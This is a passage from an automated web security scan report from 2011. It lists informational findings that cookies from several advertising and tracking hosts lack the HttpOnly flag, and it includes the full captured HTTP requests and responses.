Set-Cookie: tts="eyJOUl85MDU2XzEyNiI6MCwiOTA1Nl80OCI6MTMwMjk1MDUwMDU0MCwiOTA1Nl80NiI6MTMwMjk1MDUwMDU0MCwiOTA1Nl80OSI6MTMwNTU0MjUwMDU0MCwiTlJfOTA1Nl83NSI6MCwiOTA1Nl8xMjYiOjEzMDI5NTA1MDA1NDAsIjkwNTZfNDQiOjEzMDI5NTA1MDA1NDAsIk5SXzkwNTZfMjY5IjowLCI5MDU2XzQyIjoxMzAyOTUwNTAwNTQwLCI5MDU2XzE3MyI6MTMwNTU0MjUwMDU0MCwiTlJfOTA1Nl8xNzMiOjAsIjkwNTZfMTcwIjoxMzAyOTUwNTAwNTQwLCJOUl85MDU2XzI3MCI6MCwiOTA1Nl8yODUiOjEzMDU1NDI1MDA1NDAsIjkwNTZfMjY5IjoxMzA1NTQyNTAwNTQwLCJOUl85MDU2XzEzOSI6MCwiTlJfOTA1Nl8yNzYiOjAsIjkwNTZfNzUiOjEzMDI5NTA1MDA1NDAsIk5SXzkwNTZfNDkiOjAsIk5SXzkwNTZfNDgiOjAsIk5SXzkwNTZfMjE3IjowLCJOUl85MDU2XzE3MCI6MCwiOTA1Nl8yMTciOjEzMDI5NTA1MDA1NDAsIjkwNTZfMjcwIjoxMzA1NTQyNTAwNTQwLCJOUl85MDU2XzQ0IjowLCI5MDU2XzEzOSI6MTMwMjk1MDUwMDU0MCwiTlJfOTA1Nl80NiI6MCwiTlJfOTA1Nl8yODUiOjAsIjkwNTZfMjc2IjoxMzA1NTQyNTAwNTQwLCJzdGlja3lJZF8yOSI6bnVsbCwiTlJfOTA1Nl80MiI6MH0=";Version=1;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT;Max-Age=2147483647
Set-Cookie: checkCookie=success;Path=/;Domain=.steelhousemedia.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT
Connection: close


13.121. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: uid, pf. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=Z6z3HD7Ka9PFm_lTPlcJyUlQ-yO37BfURcbb7BumEMQAutjTrrs_D_o0Lv3V9pAvJVMIOj2uDziSnc27IJcNQA&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9342936133034.527?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=_CLkMkl0RMOD45j0Wsg1NVEsVAWo8oLKT7_oZjnIB4dd6ISB_q_vS5rapRhLZ6kj4SDJo80wBimsrZzphev9ivgHsb4j-oWssmPe5WFHQyURTUDkfjOHZfLNt9GGTnw4Zq6ZC8kiZ22OnHUC32mZqLE5y81TtPnlDGnC6fCswjA; fc=ePsfRpzouzhmWzaxidOOYedzXl_zByxS-dxKMy2bCgGwBKgjtjPFRrKyS70pSqF5MHH7n5N5MkRcXPZr8GbhWr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008; rds=15110%7C15110%7C15110%7C15110%7Cundefined%7C15110%7C15110%7Cundefined%7C15110%7C15110%7C15110%7C15110%7C15110%7C15110%7Cundefined%7C15110%7Cundefined%7Cundefined%7C15110; rv=1; uid=4325897289836481830; pf=XgAYABZIGxSt-MC7IipMsd5bNlyEQRkkMhXrkam3PMXl_8wI-IuDElnwKB6wR_ZOUGkSMP8Pn8VAR8TvETdZeEwTo0JKIWMjMJy6tGuW8X1CxpGsLjr_FDSUO6s7DAN-rvwOhTKiEB6ozjplWfA-GmdZ3kW7KFyw4Yua0NKdSC6x49DR9xNu-8EqcBJ8MiPRFWemUI9n3OLgXGmu3F70XMl066eGY_QbhSpsRERo8nuIuHRQTgKEhELMLulgSubjEdeE8ARPtyCF9fzzWEQ5dUnpZvtX7vuT0qUgblStniCyP5ldTxhbfUs-5l57Hel2oSM7wYUtlfyTv5RTafjXWSMZ5CxcluAtg1HjNFrf1cA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:56:37 GMT; Path=/
Set-Cookie: pf=qbuRlHr65Kba4HTyrdd5MH3JdGv9GZeYHo7AeFWHp0731R35t8tVFswvyCCUNmQRg2c436_EtLBPbUDtd-MYNmtAckgKwFTyh_sZsdEXBQ1CpT6DcV9IbY-hvpa_KWAErvwOhTKiEB6ozjplWfA-GmdZ3kW7KFyw4Yua0NKdSC6x49DR9xNu-8EqcBJ8MiPRFWemUI9n3OLgXGmu3F70XMl066eGY_QbhSpsRERo8nuIuHRQTgKEhELMLulgSubjEdeE8ARPtyCF9fzzWEQ5dfX6GDuctpcNnRGwBo7rSoxo-nkvo1J3Zd1nNNhXLF9CW1P_6CrTbMkoipJrBwBOyDD0FkxBUi5AYhqoFv0boAuD5cjBNWX99VFn97_13LO4; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:56:37 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=706525&t=2
Content-Length: 0
Date: Mon, 16 May 2011 01:56:37 GMT


13.122. http://rpt.footlocker.com/eluminate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rpt.footlocker.com
Path:   /eluminate

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: 90101910_login, 90101910_reset. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /eluminate?tid=14&ci=90101910&vn2=e4.0&st=1305510865474&vn1=4.8.3H&ec=utf-8&cid=Global%20Header&cat=1&ccid=Log%20In&rnd=1305542546765&ul=http%3A%2F%2Fwww.footlocker.com%2F HTTP/1.1
Host: rpt.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; CoreID6=50071305510227062460103; TestSess3=50071305510227062460103; 90101910_login=1305510229010073037890101910; SSLC=web07; 90101910_reset=1305510867

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:36:32 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90101910_login=1305542192011750759490101910; path=/
Set-Cookie: 90101910_reset=1305542192;path=/
Expires: Sun, 15 May 2011 16:36:32 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

13.123. http://rya.rockyou.com/ams/ptrck.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rya.rockyou.com
Path:   /ams/ptrck.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: _uix (set twice in the same response). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ams/ptrck.php?code=td9d4f46 HTTP/1.1
Host: rya.rockyou.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:38 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.3
Set-Cookie: _uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede; expires=Sat, 12-Nov-2011 02:01:38 GMT; path=/; domain=rockyou.com
Set-Cookie: _uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede; expires=Sat, 12-Nov-2011 02:01:38 GMT; path=/; domain=rockyou.com
Vary: Accept-Encoding,User-Agent
X-RyHeader: www236.rockyou.com took D=10868 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 125


<!-- Active server list retrived from APC Store -->
<!-- Using Ad Server http://10.130.8.33:8080/adserver/pixel -->



13.124. http://s.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: 1315892-B1315899. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=16993&_t=cm HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AG-00000001389358554; 1780853-B1781017=3|1781033|0|0|0|1781015|1781012|-1; C1780853=0@4; 66281-B66290=3|0|0|0|0|66286|110253|-1; 90514-B90519=0|0|0|0|0|66286|110253|-1; M62795-747980=1; 1315892-B1315899=0|0|0|0|0|1315897|1315896|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:57:55 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-1970 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1315892-B1315899=0|0|0|0|0|1315897|1315896|-1; domain=.ru4.com; path=/
Set-cookie: O16993=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Set-cookie: C1315892=0@0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Content-type: text/html
Content-length: 20992
Connection: close

_cm_registerCallback(1105, function (data) {

//v3.7.18

var xptid = "";
var xpsid = "";
var xpcost = "";
var xpcg = "";
var xpordernum = "";
var xprand = 0; //tes
...[SNIP]...

13.125. http://sales.liveperson.net/hc/1402662/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/1402662/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: HumanClickKEY, HumanClickACTIVE. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/1402662/?&site=1402662&cmd=mTagKnockPage&lpCallId=719463137909-934704558457&protV=20&lpjson=1&id=9169521417&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510908159; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:03:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=1762910904442911687; path=/hc/1402662
Set-Cookie: HumanClickACTIVE=1305511390360; expires=Tue, 17-May-2011 02:03:10 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:03:10 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1475

lpConnLib.Process({"ResultSet": {"lpCallId":"719463137909-934704558457","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

13.126. http://sales.liveperson.net/hc/1402662/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/1402662/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: HumanClickSiteContainerID_1402662, LivePersonID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/1402662/?&site=1402662&cmd=mTagStartPage&lpCallId=336706150556-6703310413&protV=20&lpjson=1&page=http%3A//www.bluefly.com/&id=9169521417&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-bluefly-english&activePlugin=none&cobrowse=true&pageWindowName=1305510902500&PV%21unit=bluefly-english&PV%21BlockInvite=1&PV%21pageLoadTime=12%20sec&PV%21visitorActive=1&title=Bluefly%20-%20Designer%20Clothing%2C%20Handbags%2C%20Shoes%20%26%20Accessories%20%28Prada%2C%20Fendi%2C%20Gucci%20%26%20more%29%20at%20Discount%20Prices&cookie=SSID%3DAwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI%3B%20SSSC%3D1.G5607126572844751644.1.58.1115%3B%20SSOD%3DAGHw_gAA%3B%20SSLB%3D1%3B%20SSRT%3D64PQTQE%3B%20TLTHID%3D7D2A76E47F5F107F24CCB1BBDF37F7B5%3B%20TLTSID%3D7D2A76E47F5F107F24CCB1BBDF37F7B5%3B%20JSESSIONID%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%3B%20_714bc2c9%3Dguest%3B%20CS_TRACKER_ID%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%3B%20TS18d374%3Df627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb%3B%20__utmz%3D9200358.1305510900.1.1.utmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29%3B%20__utma%3D9200358.576523501.1305510900.1305510900.1305510900.1%3B%20__utmc%3D9200358%3B%20__utmb%3D9200358.1.10.1305510900%3B%20cmTPSet%3DY%3B%20CoreAt%3D%3B%20mr_referredVisitor%3D0%3B%20bn_u%3D6923549130717770549%3B%20bn_cd%3Dd%2526g%2526s%2526r%253D0.1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8637489434147818322; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC; HumanClickACTIVE=1305510914551

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:03:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_1402662=STANDALONE; path=/hc/1402662
Set-Cookie: LivePersonID=-16101514677756-1305510918:-1:-1:-1:-1; expires=Tue, 15-May-2012 02:03:16 GMT; path=/hc/1402662; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:03:16 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 186

lpConnLib.Process({"ResultSet": {"lpCallId":"336706150556-6703310413","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

13.127. http://sales.liveperson.net/hc/1402662/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/1402662/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: HumanClickACTIVE, HumanClickSiteContainerID_1402662. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/1402662/?&site=1402662&cmd=mTagKnockPage&lpCallId=164293947862-695144355529&protV=20&lpjson=1&id=124698677&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8637489434147818322; LivePersonID=-16101514677756-1305510918:-1:-1:-1:-1; HumanClickSiteContainerID_1402662=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC; HumanClickACTIVE=1305510914551

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:07:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1305511644875; expires=Tue, 17-May-2011 02:07:24 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:07:24 GMT
Set-Cookie: HumanClickSiteContainerID_1402662=STANDALONE; path=/hc/1402662
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1475

lpConnLib.Process({"ResultSet": {"lpCallId":"164293947862-695144355529","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

13.128. http://sales.liveperson.net/hc/46281118/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/46281118/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: HumanClickACTIVE, HumanClickSiteContainerID_46281118, LivePersonID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/46281118/?&site=46281118&cmd=mTagKnockPage&lpCallId=696138575207-644512902246&protV=20&lpjson=1&id=3105604888&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-service-petco-english%7ClpMTagConfig.db1%7ClpButton-service-petco-english%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.petco.com/Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=9049118658396575219; LivePersonID=-16101514677756-1305510894:-1:-1:-1:-1; HumanClickSiteContainerID_46281118=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC; HumanClickACTIVE=1305511139578; ASPSESSIONIDSQQDDBBA=PFKNNJDBKAJLDGDMHMKKDBLP

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:14:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1305512042652; expires=Tue, 17-May-2011 02:14:02 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:14:02 GMT
Set-Cookie: HumanClickSiteContainerID_46281118=STANDALONE; path=/hc/46281118
Set-Cookie: LivePersonID=-16101514677756-1305510894:-1:1305511414:-1:-1; expires=Tue, 15-May-2012 02:14:02 GMT; path=/hc/46281118; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 27626

lpConnLib.Process({"ResultSet": {"lpCallId":"696138575207-644512902246","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

13.129. http://sales.liveperson.net/hc/46281118/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/46281118/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: HumanClickKEY, HumanClickACTIVE. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/46281118/?&site=46281118&cmd=mTagKnockPage&lpCallId=221431557555-817593283718&protV=20&lpjson=1&id=2321407874&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-petco-english-2%7ClpMTagConfig.db1%7ClpButton-sales-petco-english%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5655530747531728922; LivePersonID=-16101514677756-1305510216:-1:-1:-1:-1; HumanClickSiteContainerID_46281118=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510207439

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=7765532767891690227; path=/hc/46281118
Set-Cookie: HumanClickACTIVE=1305511278307; expires=Tue, 17-May-2011 02:01:18 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:01:18 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 27627

lpConnLib.Process({"ResultSet": {"lpCallId":"221431557555-817593283718","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

13.130. http://sales.liveperson.net/hc/53965383/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/53965383/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: HumanClickSiteContainerID_53965383, LivePersonID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/53965383/?&site=53965383&cmd=mTagStartPage&lpCallId=767577826510-270394106628&protV=20&lpjson=1&page=http%3A//www.toshibadirect.com/td/b2c/laptops.to%3Fpage%3DsegHHO&id=4691856149&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-toshiba-english&activePlugin=none&cobrowse=true&PV%21unit=toshiba&PV%21language=english&PV%21Section=laptop&PV%21pageLoadTime=77%20sec&PV%21visitorActive=1&title=Toshiba%20Direct%20%7C%20Toshiba%20Laptop%20%26%20Notebook%20Computers&cobrowse=true&cookie=tais.current.segment%3DHHO%3B%20BV_IDS%3Dcccdadfdidkkkjmcgfkceghdgngdglo.0%3A@@@@1170188602.1305510022@@@@%3B%20s_vi%3D%5BCS%5Dv1%7C26E84051851D3EE4-40000143C043A343%5BCE%5D%3B%20ysm_CK1K17SBM0N76O75C93SIIUNQINTO%3Dysm_PV1K17SBM0N76O75C93SIIUNQINTO%3A2%26ysm_SN1K17SBM0N76O75C93SIIUNQINTO%3A1305510047274%26ysm_LD1K17SBM0N76O75C93SIIUNQINTO%3A0%3B%20s_pers%3D%2520s_vnum%253D1308102050353%252526vn%25253D1%257C1308102050353%253B%2520omtr_eVar45_cvp%253D%25255B%25255B%27Direct%25252520Load%27%25252C%271305510050403%27%25255D%25255D%257C1463362850403%253B%2520s_invisit%253Dtrue%257C1305512630631%253B%2520omtr_lv%253D1305510830635%257C1400118830635%253B%2520omtr_lv_s%253DFirst%252520Visit%257C1305512630635%253B%2520s_nr%253D1305510830639%257C1308102830639%253B%2520omtr_pv%253DSearch%25253ALaptops%252520Home%252520Page%257C1305512631142%253B%3B%20s_sess%3D%2520s_cc%253Dtrue%253B%2520SC_LINKS%253D%253B%2520omtr_eVar49%253DD%25253Dc49%253B%2520c_m%253DundefinedDirect%252520LoadDirect%252520Load%253B%2520s_sq%253D%253B%2520s_ppv%253D34%253B HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=-16101514677756-1305510079:-1:-1:-1:-1; HumanClickSiteContainerID_53965383=STANDALONE; HumanClickKEY=7617520773511781761; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510908159

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_53965383=STANDALONE; path=/hc/53965383
Set-Cookie: LivePersonID=-16101514677756-1305510911:-1:-1:-1:-1; expires=Tue, 15-May-2012 02:02:56 GMT; path=/hc/53965383; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:02:56 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"767577826510-270394106628","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

13.131. http://sales.liveperson.net/hc/53965383/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/53965383/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: HumanClickACTIVE, HumanClickSiteContainerID_53965383. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/53965383/?&site=53965383&cmd=mTagKnockPage&lpCallId=462539339205-611415113089&protV=20&lpjson=1&id=9685350975&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-toshiba-english-laptop%7Cnull%7ClpButton%7C HTTP/1.1
